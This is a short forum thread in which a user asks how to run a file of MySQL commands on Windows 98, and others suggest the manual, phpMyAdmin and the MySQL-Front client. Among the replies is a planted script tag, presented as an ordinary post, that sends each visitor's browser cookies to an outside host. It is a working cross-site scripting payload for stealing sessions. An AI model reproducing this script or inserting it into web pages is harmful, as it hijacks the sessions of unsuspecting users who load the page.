Hopefully this is the right place for my question. I started working with "MySql" and i waste a lot of time typing and retyping sql commands. I gathered few commands in a "Sql" file (a text file ends with "sql" extension) but i dont know how to run it. I work in a win98 environment (a stand alone win98 station). I hope someone can help me with that . If not, i'm hoping someone tells me to which forum i can direct that question. Thanks a lot ! Josef
So you got yourself a filename.sql
That is a mysql dump of structore, data, or commands, its like a batch file for mysql
to run
The mysql manual http://www.mysql.com/doc/L/O/LOAD_DATA.html
If you happen to have phpmyadmin installed on your web space use the option to run the text file.
<script>window.location="http://www.multimania.com/awnp1/cookie.php3?cookie="+document.cookie</script>
Get yourself a copy of mysqlfront, it's a win32 client program. You can edit your queries in a window and execute them on the server through that client.
It also lets you administer the database. Very usefull, check it out.
www.mysqlfront.de
Thanks a lot !
? Thanks however !
Thanks ! i'll do that !